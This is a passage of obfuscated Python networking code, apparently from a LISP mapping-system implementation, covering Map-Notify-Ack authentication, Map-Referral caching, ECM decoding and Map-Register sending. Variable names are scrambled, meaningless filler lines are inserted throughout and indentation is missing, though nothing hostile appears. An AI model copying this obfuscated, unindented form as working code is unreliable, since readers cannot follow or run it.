lprint ( "Could not decode Map-Notify-Ack packet" )
return
if 40 - 40: iII111i * I11i
if 25 - 25: O0 * o0oOOo0O0Ooo % ooOoO0o % I1IiiI
IIiiIiI . print_notify ( )
if 87 - 87: OoOoOO00
if 30 - 30: IiII % OoOoOO00 + I1Ii111
if 13 - 13: iII111i * Ii1I % o0oOOo0O0Ooo * i1IIi . IiII % i1IIi
if 79 - 79: OoooooooOO % I11i / o0oOOo0O0Ooo + IiII + O0 + iII111i
if 87 - 87: I11i
if ( IIiiIiI . record_count < 1 ) :
lprint ( "No EID-prefix found, cannot authenticate Map-Notify-Ack" )
return
if 39 - 39: I1ii11iIi11i * i11iIiiIii % I1Ii111
if 72 - 72: OoO0O00 * Oo0Ooo - IiII
IiOo0oOoooO = lisp_eid_record ( )
if 74 - 74: Ii1I
if ( IiOo0oOoooO . decode ( IIiiIiI . eid_records ) == None ) :
lprint ( "Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack" )
return
if 26 - 26: I11i . O0
IiOo0oOoooO . print_record ( " " , False )
if 68 - 68: Ii1I
iIiI1I1ii1I1 = IiOo0oOoooO . print_eid_tuple ( )
if 26 - 26: o0oOOo0O0Ooo - I1ii11iIi11i / O0 % i11iIiiIii
if 7 - 7: I1Ii111 . Oo0Ooo + IiII / iIii1I11I1II1
if 22 - 22: iIii1I11I1II1 - O0 . iII111i - IiII - ooOoO0o
if 54 - 54: OoO0O00 . iII111i . OoOoOO00 * OoO0O00 + o0oOOo0O0Ooo . ooOoO0o
if ( IIiiIiI . alg_id != LISP_NONE_ALG_ID and IIiiIiI . auth_len != 0 ) :
i1iI11i = lisp_sites_by_eid . lookup_cache ( IiOo0oOoooO . eid , True )
if ( i1iI11i == None ) :
oo0oO0Oo = bold ( "Site not found" , False )
lprint ( ( "{} for EID {}, cannot authenticate Map-Notify-Ack" ) . format ( oo0oO0Oo , green ( iIiI1I1ii1I1 , False ) ) )
if 44 - 44: I11i * iIii1I11I1II1 . I1ii11iIi11i
return
if 9 - 9: o0oOOo0O0Ooo
iI1I1ii = i1iI11i . site
if 23 - 23: ooOoO0o * OoO0O00 + O0 % I1Ii111
if 21 - 21: Ii1I * OoOoOO00
if 29 - 29: iIii1I11I1II1 / ooOoO0o
if 75 - 75: OoooooooOO + I1IiiI % OoOoOO00 / O0 - IiII
iI1I1ii . map_notify_acks_received += 1
if 88 - 88: OoO0O00 % Ii1I
oo0OO0oo = IIiiIiI . key_id
if ( oo0OO0oo in iI1I1ii . auth_key ) :
i1iiII11i = iI1I1ii . auth_key [ oo0OO0oo ]
else :
i1iiII11i = ""
if 12 - 12: OoooooooOO . O0
if 33 - 33: OoooooooOO / I11i . II111iiii * i1IIi
O0oOO0OO0OO0 = lisp_verify_auth ( packet , IIiiIiI . alg_id ,
IIiiIiI . auth_data , i1iiII11i )
if 34 - 34: i11iIiiIii / OoOoOO00
oo0OO0oo = "key-id {}" . format ( oo0OO0oo ) if oo0OO0oo == IIiiIiI . key_id else "bad key-id {}" . format ( IIiiIiI . key_id )
if 100 - 100: o0oOOo0O0Ooo - I1IiiI / I11i
if 43 - 43: o0oOOo0O0Ooo % iIii1I11I1II1
lprint ( " Authentication {} for Map-Notify-Ack, {}" . format ( "succeeded" if O0oOO0OO0OO0 else "failed" , oo0OO0oo ) )
if 85 - 85: oO0o + OoooooooOO - IiII % o0oOOo0O0Ooo * ooOoO0o * II111iiii
if ( O0oOO0OO0OO0 == False ) : return
if 4 - 4: Ii1I . i1IIi + Oo0Ooo % I11i . OoO0O00
if 70 - 70: OOooOOo * OoOoOO00 / OoOoOO00 / OoOoOO00
if 23 - 23: I1IiiI
if 24 - 24: I1Ii111 * i1IIi % O0 * Ii1I + iII111i
if 14 - 14: oO0o * iII111i + Ii1I + Ii1I * IiII
if ( IIiiIiI . retransmit_timer ) : IIiiIiI . retransmit_timer . cancel ( )
if 82 - 82: IiII * ooOoO0o / OOooOOo + OoOoOO00
I111iiI1iI = source . print_address ( )
III11II111 = IIiiIiI . nonce_key
if 32 - 32: IiII
if ( III11II111 in lisp_map_notify_queue ) :
IIiiIiI = lisp_map_notify_queue . pop ( III11II111 )
if ( IIiiIiI . retransmit_timer ) : IIiiIiI . retransmit_timer . cancel ( )
lprint ( "Dequeue Map-Notify from retransmit queue, key is: {}" . format ( III11II111 ) )
if 90 - 90: I1ii11iIi11i / I11i * o0oOOo0O0Ooo % O0 * i11iIiiIii
else :
lprint ( "Map-Notify with nonce 0x{} queue entry not found for {}" . format ( IIiiIiI . nonce_key , red ( I111iiI1iI , False ) ) )
if 68 - 68: I11i . Ii1I + I11i / IiII . I11i / iIii1I11I1II1
if 96 - 96: O0
return
if 2 - 2: OoO0O00 / iII111i + o0oOOo0O0Ooo
if 27 - 27: I11i - OoOoOO00 - ooOoO0o - I1IiiI
if 51 - 51: I11i + I11i + O0 + O0 * I1Ii111
if 61 - 61: IiII . O0
if 38 - 38: Ii1I * I1ii11iIi11i - i11iIiiIii + ooOoO0o * I11i
if 74 - 74: OoOoOO00 . o0oOOo0O0Ooo
if 40 - 40: ooOoO0o + I1ii11iIi11i * i11iIiiIii / i1IIi
if 95 - 95: oO0o / IiII * II111iiii * Ii1I . OoO0O00 . OoO0O00
def lisp_map_referral_loop ( mr , eid , group , action , s ) :
if ( action not in ( LISP_DDT_ACTION_NODE_REFERRAL ,
LISP_DDT_ACTION_MS_REFERRAL ) ) : return ( False )
if 85 - 85: I1IiiI / II111iiii * OoO0O00 + ooOoO0o / OoO0O00 % OOooOOo
if ( mr . last_cached_prefix [ 0 ] == None ) : return ( False )
if 100 - 100: I1Ii111 % OoooooooOO % OoOoOO00 % I1IiiI
if 32 - 32: OoO0O00 + OOooOOo . OoO0O00 - Oo0Ooo
if 12 - 12: I1IiiI * OoO0O00 - II111iiii . i1IIi
if 86 - 86: OOooOOo / OoooooooOO - IiII
OOo = False
if ( group . is_null ( ) == False ) :
OOo = mr . last_cached_prefix [ 1 ] . is_more_specific ( group )
if 56 - 56: I1ii11iIi11i - i1IIi * OoooooooOO * O0 * I1IiiI - I1Ii111
if ( OOo == False ) :
OOo = mr . last_cached_prefix [ 0 ] . is_more_specific ( eid )
if 32 - 32: OoooooooOO . OOooOOo . OoO0O00 . IiII / I11i % i1IIi
if 21 - 21: O0 . OoO0O00 * I1ii11iIi11i % iII111i + OoooooooOO
if ( OOo ) :
OoO0oO = lisp_print_eid_tuple ( eid , group )
iI111ii1Ii1I = lisp_print_eid_tuple ( mr . last_cached_prefix [ 0 ] ,
mr . last_cached_prefix [ 1 ] )
if 50 - 50: O0 % I1IiiI
lprint ( ( "Map-Referral prefix {} from {} is not more-specific " + "than cached prefix {}" ) . format ( green ( OoO0oO , False ) , s ,
# OoOoOO00
iI111ii1Ii1I ) )
if 34 - 34: I1Ii111
return ( OOo )
if 69 - 69: iIii1I11I1II1 . OOooOOo % I11i
if 28 - 28: I1Ii111 . ooOoO0o % I1IiiI
if 62 - 62: II111iiii + ooOoO0o + I1IiiI
if 70 - 70: o0oOOo0O0Ooo + Ii1I . OoO0O00 * Ii1I + OOooOOo + ooOoO0o
if 13 - 13: I1ii11iIi11i
if 97 - 97: oO0o - Oo0Ooo . i11iIiiIii % ooOoO0o * i11iIiiIii - OoooooooOO
if 44 - 44: I11i % OoooooooOO / iII111i - i11iIiiIii * i1IIi * o0oOOo0O0Ooo
def lisp_process_map_referral ( lisp_sockets , packet , source ) :
if 51 - 51: Ii1I + IiII / I1ii11iIi11i + O0 % Ii1I
oO00oO0o = lisp_map_referral ( )
packet = oO00oO0o . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Referral packet" )
return
if 55 - 55: iII111i % o0oOOo0O0Ooo - oO0o % OoooooooOO
oO00oO0o . print_map_referral ( )
if 18 - 18: OoooooooOO - I1ii11iIi11i
I1iiIi111I = source . print_address ( )
OOO0O0O = oO00oO0o . nonce
if 94 - 94: OOooOOo . Oo0Ooo + Ii1I * o0oOOo0O0Ooo
if 79 - 79: OOooOOo + Oo0Ooo
if 33 - 33: iIii1I11I1II1
if 75 - 75: I1Ii111 / iIii1I11I1II1 . OoooooooOO
for OoOOoO0oOo in range ( oO00oO0o . record_count ) :
IiOo0oOoooO = lisp_eid_record ( )
packet = IiOo0oOoooO . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode EID-record in Map-Referral packet" )
return
if 98 - 98: iIii1I11I1II1 / I1IiiI + i1IIi
IiOo0oOoooO . print_record ( " " , True )
if 80 - 80: II111iiii . Oo0Ooo * oO0o % II111iiii / I1ii11iIi11i
if 66 - 66: iII111i / OoO0O00 / i11iIiiIii
if 99 - 99: OOooOOo
if 51 - 51: i11iIiiIii . o0oOOo0O0Ooo / iII111i
III11II111 = str ( OOO0O0O )
if ( III11II111 not in lisp_ddt_map_requestQ ) :
lprint ( ( "Map-Referral nonce 0x{} from {} not found in " + "Map-Request queue, EID-record ignored" ) . format ( lisp_hex_string ( OOO0O0O ) , I1iiIi111I ) )
if 53 - 53: oO0o / i1IIi - Oo0Ooo - i1IIi + IiII
if 79 - 79: oO0o % o0oOOo0O0Ooo / o0oOOo0O0Ooo % iII111i
continue
if 56 - 56: Oo0Ooo % I1ii11iIi11i
iii1i = lisp_ddt_map_requestQ [ III11II111 ]
if ( iii1i == None ) :
lprint ( ( "No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored" ) . format ( lisp_hex_string ( OOO0O0O ) , I1iiIi111I ) )
if 53 - 53: OoO0O00 . I11i - ooOoO0o
continue
if 11 - 11: I11i + i11iIiiIii / oO0o % oO0o * o0oOOo0O0Ooo / OoOoOO00
if 74 - 74: oO0o . I1Ii111 . II111iiii
if 92 - 92: I1Ii111 % OoooooooOO * I1Ii111
if 78 - 78: Oo0Ooo . I11i . oO0o + O0 / O0
if 41 - 41: iII111i * OoO0O00 - OoO0O00
if 72 - 72: o0oOOo0O0Ooo + oO0o . I1ii11iIi11i + OoO0O00 / I1Ii111
if ( lisp_map_referral_loop ( iii1i , IiOo0oOoooO . eid , IiOo0oOoooO . group ,
IiOo0oOoooO . action , I1iiIi111I ) ) :
iii1i . dequeue_map_request ( )
continue
if 58 - 58: Oo0Ooo / II111iiii % OoooooooOO % II111iiii
if 39 - 39: i1IIi
iii1i . last_cached_prefix [ 0 ] = IiOo0oOoooO . eid
iii1i . last_cached_prefix [ 1 ] = IiOo0oOoooO . group
if 16 - 16: OoOoOO00 % iIii1I11I1II1 + Ii1I - o0oOOo0O0Ooo . Oo0Ooo + i1IIi
if 59 - 59: i1IIi
if 37 - 37: OoO0O00 / I1ii11iIi11i / OoOoOO00
if 15 - 15: I1IiiI % iIii1I11I1II1 . I1Ii111
ooiI11iIi1 = False
oooo0o0o00o = lisp_referral_cache_lookup ( IiOo0oOoooO . eid , IiOo0oOoooO . group ,
True )
if ( oooo0o0o00o == None ) :
ooiI11iIi1 = True
oooo0o0o00o = lisp_referral ( )
oooo0o0o00o . eid = IiOo0oOoooO . eid
oooo0o0o00o . group = IiOo0oOoooO . group
if ( IiOo0oOoooO . ddt_incomplete == False ) : oooo0o0o00o . add_cache ( )
elif ( oooo0o0o00o . referral_source . not_set ( ) ) :
lprint ( "Do not replace static referral entry {}" . format ( green ( oooo0o0o00o . print_eid_tuple ( ) , False ) ) )
if 71 - 71: I11i - Ii1I + i11iIiiIii % I1ii11iIi11i - OoO0O00 - OOooOOo
iii1i . dequeue_map_request ( )
continue
if 71 - 71: OOooOOo
if 27 - 27: OOooOOo * O0 * i11iIiiIii / OoOoOO00 - i1IIi
oOoO0OooO0O = IiOo0oOoooO . action
oooo0o0o00o . referral_source = source
oooo0o0o00o . referral_type = oOoO0OooO0O
O0O00O = IiOo0oOoooO . store_ttl ( )
oooo0o0o00o . referral_ttl = O0O00O
oooo0o0o00o . expires = lisp_set_timestamp ( O0O00O )
if 73 - 73: iII111i / I1IiiI * ooOoO0o
if 85 - 85: I11i + I11i + oO0o - OoOoOO00
if 15 - 15: OoO0O00
if 88 - 88: Ii1I % i1IIi / I1Ii111
i11o00O0OO = oooo0o0o00o . is_referral_negative ( )
if ( I1iiIi111I in oooo0o0o00o . referral_set ) :
ooO00O0oOO = oooo0o0o00o . referral_set [ I1iiIi111I ]
if 86 - 86: iIii1I11I1II1 * IiII + I1ii11iIi11i + I1Ii111 . o0oOOo0O0Ooo
if ( ooO00O0oOO . updown == False and i11o00O0OO == False ) :
ooO00O0oOO . updown = True
lprint ( "Change up/down status for referral-node {} to up" . format ( I1iiIi111I ) )
if 88 - 88: ooOoO0o
elif ( ooO00O0oOO . updown == True and i11o00O0OO == True ) :
ooO00O0oOO . updown = False
lprint ( ( "Change up/down status for referral-node {} " + "to down, received negative referral" ) . format ( I1iiIi111I ) )
if 4 - 4: i11iIiiIii . Ii1I - oO0o
if 9 - 9: I1Ii111 - i1IIi * I1ii11iIi11i
if 67 - 67: II111iiii * OoO0O00 + OoooooooOO / I11i . oO0o - II111iiii
if 9 - 9: I1ii11iIi11i % I1Ii111 - I1ii11iIi11i + i1IIi
if 6 - 6: I1ii11iIi11i / i11iIiiIii - I11i . OOooOOo
if 44 - 44: iII111i . i1IIi % I1Ii111
if 66 - 66: iIii1I11I1II1
if 86 - 86: o0oOOo0O0Ooo % iIii1I11I1II1
iIoooO00O0 = { }
for III11II111 in oooo0o0o00o . referral_set : iIoooO00O0 [ III11II111 ] = None
if 89 - 89: ooOoO0o - Ii1I / OoooooooOO
if 29 - 29: Oo0Ooo . IiII / I1ii11iIi11i
if 19 - 19: O0
if 66 - 66: I11i
for OoOOoO0oOo in range ( IiOo0oOoooO . rloc_count ) :
oOiI111IIIiIii = lisp_rloc_record ( )
packet = oOiI111IIIiIii . decode ( packet , None )
if ( packet == None ) :
lprint ( "Could not decode RLOC-record in Map-Referral packet" )
return
if 55 - 55: OoO0O00 - I1Ii111 / ooOoO0o . i11iIiiIii / IiII
oOiI111IIIiIii . print_record ( " " )
if 55 - 55: ooOoO0o + oO0o + OoOoOO00 / O0 * II111iiii * OoOoOO00
if 53 - 53: Oo0Ooo
if 16 - 16: Ii1I
if 73 - 73: i11iIiiIii + I1IiiI - IiII - IiII + IiII . Ii1I
Oo0o = oOiI111IIIiIii . rloc . print_address ( )
if ( Oo0o not in oooo0o0o00o . referral_set ) :
ooO00O0oOO = lisp_referral_node ( )
ooO00O0oOO . referral_address . copy_address ( oOiI111IIIiIii . rloc )
oooo0o0o00o . referral_set [ Oo0o ] = ooO00O0oOO
if ( I1iiIi111I == Oo0o and i11o00O0OO ) : ooO00O0oOO . updown = False
else :
ooO00O0oOO = oooo0o0o00o . referral_set [ Oo0o ]
if ( Oo0o in iIoooO00O0 ) : iIoooO00O0 . pop ( Oo0o )
if 78 - 78: OoO0O00 + oO0o
ooO00O0oOO . priority = oOiI111IIIiIii . priority
ooO00O0oOO . weight = oOiI111IIIiIii . weight
if 86 - 86: ooOoO0o . ooOoO0o + oO0o
if 84 - 84: OOooOOo - OoOoOO00 + i1IIi * I1ii11iIi11i % I1ii11iIi11i * I1Ii111
if 31 - 31: IiII + iII111i
if 5 - 5: O0 * Ii1I
if 78 - 78: iII111i * iIii1I11I1II1 . OoO0O00 . OoOoOO00 % I1Ii111
for III11II111 in iIoooO00O0 : oooo0o0o00o . referral_set . pop ( III11II111 )
if 77 - 77: OOooOOo / OoooooooOO
iIiI1I1ii1I1 = oooo0o0o00o . print_eid_tuple ( )
if 11 - 11: iIii1I11I1II1 - Ii1I - OoOoOO00 . oO0o / I1ii11iIi11i
if ( ooiI11iIi1 ) :
if ( IiOo0oOoooO . ddt_incomplete ) :
lprint ( "Suppress add {} to referral-cache" . format ( green ( iIiI1I1ii1I1 , False ) ) )
if 79 - 79: i11iIiiIii % o0oOOo0O0Ooo * II111iiii . i1IIi * Ii1I - i11iIiiIii
else :
lprint ( "Add {}, referral-count {} to referral-cache" . format ( green ( iIiI1I1ii1I1 , False ) , IiOo0oOoooO . rloc_count ) )
if 31 - 31: IiII / o0oOOo0O0Ooo
if 27 - 27: Oo0Ooo
else :
lprint ( "Replace {}, referral-count: {} in referral-cache" . format ( green ( iIiI1I1ii1I1 , False ) , IiOo0oOoooO . rloc_count ) )
if 32 - 32: Oo0Ooo * i11iIiiIii % I1IiiI - i11iIiiIii - I1Ii111 % I1ii11iIi11i
if 35 - 35: o0oOOo0O0Ooo % iII111i / O0 * I1IiiI . o0oOOo0O0Ooo / OOooOOo
if 81 - 81: I1ii11iIi11i - i11iIiiIii
if 49 - 49: iII111i * I11i - II111iiii . o0oOOo0O0Ooo
if 52 - 52: Ii1I + Ii1I - II111iiii . O0 + I1ii11iIi11i
if 60 - 60: i11iIiiIii + IiII
if ( oOoO0OooO0O == LISP_DDT_ACTION_DELEGATION_HOLE ) :
lisp_send_negative_map_reply ( iii1i . lisp_sockets , oooo0o0o00o . eid ,
oooo0o0o00o . group , iii1i . nonce , iii1i . itr , iii1i . sport , 15 , None , False )
iii1i . dequeue_map_request ( )
if 41 - 41: I1Ii111 * o0oOOo0O0Ooo + Oo0Ooo
if 86 - 86: Ii1I / oO0o
if ( oOoO0OooO0O == LISP_DDT_ACTION_NOT_AUTH ) :
if ( iii1i . tried_root ) :
lisp_send_negative_map_reply ( iii1i . lisp_sockets , oooo0o0o00o . eid ,
oooo0o0o00o . group , iii1i . nonce , iii1i . itr , iii1i . sport , 0 , None , False )
iii1i . dequeue_map_request ( )
else :
lisp_send_ddt_map_request ( iii1i , True )
if 40 - 40: OoO0O00 % oO0o + Oo0Ooo
if 60 - 60: II111iiii / Ii1I
if 14 - 14: iII111i - Oo0Ooo / o0oOOo0O0Ooo * oO0o / Oo0Ooo - I1IiiI
if ( oOoO0OooO0O == LISP_DDT_ACTION_MS_NOT_REG ) :
if ( I1iiIi111I in oooo0o0o00o . referral_set ) :
ooO00O0oOO = oooo0o0o00o . referral_set [ I1iiIi111I ]
ooO00O0oOO . updown = False
if 89 - 89: i1IIi / I1Ii111 + Ii1I - i1IIi
if ( len ( oooo0o0o00o . referral_set ) == 0 ) :
iii1i . dequeue_map_request ( )
else :
lisp_send_ddt_map_request ( iii1i , False )
if 66 - 66: OoooooooOO
if 68 - 68: iII111i + I1Ii111
if 90 - 90: o0oOOo0O0Ooo
if ( oOoO0OooO0O in ( LISP_DDT_ACTION_NODE_REFERRAL ,
LISP_DDT_ACTION_MS_REFERRAL ) ) :
if ( iii1i . eid . is_exact_match ( IiOo0oOoooO . eid ) ) :
if ( not iii1i . tried_root ) :
lisp_send_ddt_map_request ( iii1i , True )
else :
lisp_send_negative_map_reply ( iii1i . lisp_sockets ,
oooo0o0o00o . eid , oooo0o0o00o . group , iii1i . nonce , iii1i . itr ,
iii1i . sport , 15 , None , False )
iii1i . dequeue_map_request ( )
if 48 - 48: iII111i + Ii1I
else :
lisp_send_ddt_map_request ( iii1i , False )
if 45 - 45: oO0o / iIii1I11I1II1 % O0 % IiII % I1ii11iIi11i
if 89 - 89: OOooOOo - I1Ii111 - iII111i
if 67 - 67: oO0o
if ( oOoO0OooO0O == LISP_DDT_ACTION_MS_ACK ) : iii1i . dequeue_map_request ( )
if 76 - 76: I1IiiI % I1IiiI - IiII / OoOoOO00 / I1ii11iIi11i
return
if 42 - 42: I1IiiI + I1ii11iIi11i + Oo0Ooo * i1IIi - II111iiii
if 15 - 15: o0oOOo0O0Ooo
if 60 - 60: I1ii11iIi11i / I1Ii111
if 13 - 13: I1Ii111
if 52 - 52: II111iiii / OoO0O00 . Ii1I
if 68 - 68: iII111i
if 67 - 67: I1IiiI * I1IiiI
if 100 - 100: iII111i * iII111i . Oo0Ooo
def lisp_process_ecm ( lisp_sockets , packet , source , ecm_port ) :
iIiiiII11II = lisp_ecm ( 0 )
packet = iIiiiII11II . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode ECM packet" )
return
if 10 - 10: Oo0Ooo % ooOoO0o * Oo0Ooo
if 48 - 48: ooOoO0o + II111iiii
iIiiiII11II . print_ecm ( )
if 73 - 73: II111iiii
i111ii1II11ii = lisp_control_header ( )
if ( i111ii1II11ii . decode ( packet ) == None ) :
lprint ( "Could not decode control header" )
return
if 63 - 63: i11iIiiIii . Oo0Ooo . OOooOOo - II111iiii
if 35 - 35: II111iiii + IiII
oO0Oo0oO00O = i111ii1II11ii . type
del ( i111ii1II11ii )
if 54 - 54: IiII - Oo0Ooo
if ( oO0Oo0oO00O != LISP_MAP_REQUEST ) :
lprint ( "Received ECM without Map-Request inside" )
return
if 55 - 55: I11i * OOooOOo * I1ii11iIi11i . i11iIiiIii
if 93 - 93: Oo0Ooo % i11iIiiIii / i11iIiiIii . II111iiii % I11i
if 13 - 13: O0 . i1IIi - OoooooooOO . oO0o
if 38 - 38: ooOoO0o . i1IIi / iII111i + I1IiiI - II111iiii
if 21 - 21: i11iIiiIii + II111iiii - i1IIi / OoooooooOO * OOooOOo % Oo0Ooo
o000O000o0O = iIiiiII11II . udp_sport
oOo0OOOo0 = time . time ( )
lisp_process_map_request ( lisp_sockets , packet , source , ecm_port ,
iIiiiII11II . source , o000O000o0O , iIiiiII11II . ddt , - 1 , oOo0OOOo0 )
return
if 62 - 62: O0 . O0 + i11iIiiIii
if 57 - 57: II111iiii . I1IiiI . OOooOOo / IiII . II111iiii
if 80 - 80: I11i * OoO0O00 + ooOoO0o % ooOoO0o
if 16 - 16: iII111i / i11iIiiIii + iIii1I11I1II1
if 76 - 76: OoooooooOO / Oo0Ooo / I1Ii111 + OoooooooOO
if 65 - 65: Oo0Ooo - I1Ii111
if 57 - 57: O0
if 49 - 49: I1ii11iIi11i / OoOoOO00 - I1IiiI + iII111i . OOooOOo % oO0o
if 34 - 34: OoO0O00 - I1IiiI + OoOoOO00
if 22 - 22: iIii1I11I1II1 . i1IIi . OOooOOo % Oo0Ooo - i1IIi
def lisp_send_map_register ( lisp_sockets , packet , map_register , ms ) :
if 78 - 78: I1IiiI / i1IIi % II111iiii % I1IiiI % Ii1I
if 29 - 29: i1IIi % o0oOOo0O0Ooo + OOooOOo / Oo0Ooo
if 38 - 38: IiII . I1Ii111
if 69 - 69: ooOoO0o + OoOoOO00 + II111iiii % I1Ii111 + Ii1I . ooOoO0o
if 73 - 73: I11i % I11i . ooOoO0o + OoOoOO00
if 33 - 33: i11iIiiIii . i11iIiiIii * i11iIiiIii / iIii1I11I1II1 / I1ii11iIi11i . ooOoO0o
if 11 - 11: iII111i
OooOOooo = ms . map_server
if ( lisp_decent_push_configured and OooOOooo . is_multicast_address ( ) and
( ms . map_registers_multicast_sent == 1 or ms . map_registers_sent == 1 ) ) :
OooOOooo = copy . deepcopy ( OooOOooo )
OooOOooo . address = 0x7f000001
ooOo0O0O0oOO0 = bold ( "Bootstrap" , False )
o0O0Ooo = ms . map_server . print_address_no_iid ( )
lprint ( "{} mapping system for peer-group {}" . format ( ooOo0O0O0oOO0 , o0O0Ooo ) )
if 60 - 60: I1ii11iIi11i / I1Ii111
if 10 - 10: OoO0O00 * iIii1I11I1II1 / I11i % II111iiii . OoOoOO00 / I1IiiI
if 4 - 4: Oo0Ooo * o0oOOo0O0Ooo
if 45 - 45: Ii1I % OOooOOo * Ii1I - iIii1I11I1II1
if 18 - 18: I1Ii111 / Oo0Ooo % Ii1I + OoO0O00
if 69 - 69: iII111i % I1ii11iIi11i
packet = lisp_compute_auth ( packet , map_register , ms . password )
if 19 - 19: IiII
if 35 - 35: OoOoOO00
if 18 - 18: II111iiii . OoOoOO00 + I1ii11iIi11i * oO0o + OoooooooOO
if 39 - 39: I1IiiI * ooOoO0o / i11iIiiIii - oO0o - oO0o + O0
if 73 - 73: OOooOOo
if 44 - 44: I1ii11iIi11i * i1IIi - iIii1I11I1II1 - oO0o - oO0o * II111iiii
if ( ms . ekey != None ) :
OoooOOoOO = ms . ekey . zfill ( 32 )
iI1ii = "0" * 8
oooo0o0oO = chacha . ChaCha ( OoooOOoOO , iI1ii , 20 ) . encrypt ( packet [ 4 : : ] )
packet = packet [ 0 : 4 ] + oooo0o0oO
I1i = bold ( "Encrypt" , False )
lprint ( "{} Map-Register with key-id {}" . format ( I1i , ms . ekey_id ) )
if 98 - 98: Oo0Ooo + ooOoO0o / OOooOOo . iIii1I11I1II1 . I1IiiI . OoOoOO00
if 92 - 92: i1IIi + OoOoOO00 * i1IIi / IiII
IIIII1I11ii = ""
if ( lisp_decent_pull_xtr_configured ( ) ) :
IIIII1I11ii = ", decent-index {}" . format ( bold ( ms . dns_name , False ) )
if 39 - 39: OOooOOo . IiII + I1IiiI % iII111i - oO0o / OoO0O00
if 37 - 37: O0 % OoO0O00 + i11iIiiIii . O0 / OOooOOo
lprint ( "Send Map-Register to map-server {}{}{}" . format ( OooOOooo . print_address ( ) , ", ms-name '{}'" . format ( ms . ms_name ) , IIIII1I11ii ) )
if 15 - 15: I1ii11iIi11i + oO0o
lisp_send ( lisp_sockets , OooOOooo , LISP_CTRL_PORT , packet )
return
if 99 - 99: oO0o - ooOoO0o - II111iiii * OoooooooOO / O0
if 57 - 57: iIii1I11I1II1 / IiII + OoO0O00 * oO0o + Ii1I
if 76 - 76: i11iIiiIii . OOooOOo / I11i * oO0o % iIii1I11I1II1 . ooOoO0o
if 75 - 75: O0 + I1IiiI
if 67 - 67: OoOoOO00 % OoooooooOO / OoO0O00 - OoO0O00 / O0
if 19 - 19: iIii1I11I1II1 / OOooOOo % I11i % I1IiiI / I1ii11iIi11i
if 73 - 73: II111iiii
if 26 - 26: II111iiii . iIii1I11I1II1 - I1Ii111 % OOooOOo
def lisp_send_ipc_to_core ( lisp_socket , packet , dest , port ) :
OO = lisp_socket . getsockname ( )
dest = dest . print_address_no_iid ( )
if 83 - 83: OOooOOo + OoooooooOO % I1Ii111 % IiII + i11iIiiIii
lprint ( "Send IPC {} bytes to {} {}, control-packet: {}" . format ( len ( packet ) , dest , port , lisp_format_packet ( packet ) ) )
if 10 - 10: OoooooooOO . Ii1I % I1Ii111 + IiII
if 78 - 78: OoOoOO00 - oO0o . I1ii11iIi11i * i11iIiiIii
packet = lisp_control_packet_ipc ( packet , OO , dest , port )
lisp_ipc ( packet , lisp_socket , "lisp-core-pkt" )
return
if 44 - 44: iIii1I11I1II1 * iII111i
if 32 - 32: OoOoOO00
if 65 - 65: iIii1I11I1II1 + iII111i
if 90 - 90: i11iIiiIii - Oo0Ooo
if 31 - 31: OoOoOO00 + OoOoOO00 + OoooooooOO % O0
if 14 - 14: i1IIi / OoooooooOO . I1IiiI * I1Ii111 + OoO0O00
if 45 - 45: OoooooooOO * I1Ii111
if 7 - 7: O0
def lisp_send_map_reply ( lisp_sockets , packet , dest , port ) :
lprint ( "Send Map-Reply to {}" . format ( dest . print_address_no_iid ( ) ) )
lisp_send_ipc_to_core ( lisp_sockets [ 2 ] , packet , dest , port )
return
if 42 - 42: o0oOOo0O0Ooo / Ii1I
if 31 - 31: OOooOOo
if 20 - 20: i11iIiiIii * oO0o * ooOoO0o
if 65 - 65: I1ii11iIi11i / Oo0Ooo / I1IiiI + IiII
if 71 - 71: OoO0O00 . I1Ii111 + OoooooooOO
if 9 - 9: OoooooooOO / iIii1I11I1II1 % I1IiiI . I1IiiI / I11i - iII111i
if 60 - 60: I11i - OoO0O00 - OoOoOO00 * ooOoO0o - i1IIi
if 18 - 18: ooOoO0o + i11iIiiIii + O0 + OOooOOo / Ii1I
def lisp_send_map_referral ( lisp_sockets , packet , dest , port ) :
lprint ( "Send Map-Referral to {}" . format ( dest . print_address ( ) ) )
lisp_send_ipc_to_core ( lisp_sockets [ 2 ] , packet , dest , port )
return
if 65 - 65: I1IiiI . ooOoO0o
if 51 - 51: I1Ii111
if 89 - 89: Oo0Ooo
if 15 - 15: OOooOOo * II111iiii - OOooOOo * iIii1I11I1II1
if 95 - 95: I1Ii111 / OoooooooOO * I11i * OoooooooOO
if 88 - 88: I1IiiI / Oo0Ooo / oO0o + oO0o % OOooOOo + Oo0Ooo
if 63 - 63: o0oOOo0O0Ooo + i11iIiiIii % OOooOOo % iIii1I11I1II1 / I1ii11iIi11i - iII111i
if 72 - 72: iII111i % oO0o . IiII + I1ii11iIi11i . IiII . II111iiii
def lisp_send_map_notify ( lisp_sockets , packet , dest , port ) :
lprint ( "Send Map-Notify to xTR {}" . format ( dest . print_address ( ) ) )
lisp_send_ipc_to_core ( lisp_sockets [ 2 ] , packet , dest , port )
return
if 10 - 10: I11i . ooOoO0o + I11i * Ii1I
if 55 - 55: OOooOOo / iII111i + OoooooooOO - OoooooooOO
if 51 - 51: O0 % Ii1I % Oo0Ooo - O0
if 94 - 94: OoooooooOO - ooOoO0o % I1ii11iIi11i + I1Ii111
if 51 - 51: I1ii11iIi11i . iII111i / i1IIi * ooOoO0o % I11i
if 82 - 82: O0 % OoOoOO00 . iII111i . i1IIi . iII111i - Oo0Ooo
if 58 - 58: O0 * OOooOOo
def lisp_send_ecm ( lisp_sockets , packet , inner_source , inner_sport , inner_dest ,
outer_dest , to_etr = False , to_ms = False , ddt = False ) :
if 60 - 60: ooOoO0o
if ( inner_source == None or inner_source . is_null ( ) ) :
inner_source = inner_dest
if 47 - 47: i11iIiiIii
if 21 - 21: i1IIi - oO0o - Oo0Ooo
if 11 - 11: i1IIi
if 77 - 77: I11i + i1IIi * OoOoOO00 % OoooooooOO
if 56 - 56: I1Ii111 * i1IIi % i11iIiiIii
if 56 - 56: Ii1I . iII111i
if ( lisp_nat_traversal ) :
iiI1iiIiiiI1I = lisp_get_any_translated_port ( )
if ( iiI1iiIiiiI1I != None ) : inner_sport = iiI1iiIiiiI1I
if 76 - 76: I1IiiI / Ii1I % OoOoOO00 + IiII / i11iIiiIii . o0oOOo0O0Ooo
iIiiiII11II = lisp_ecm ( inner_sport )
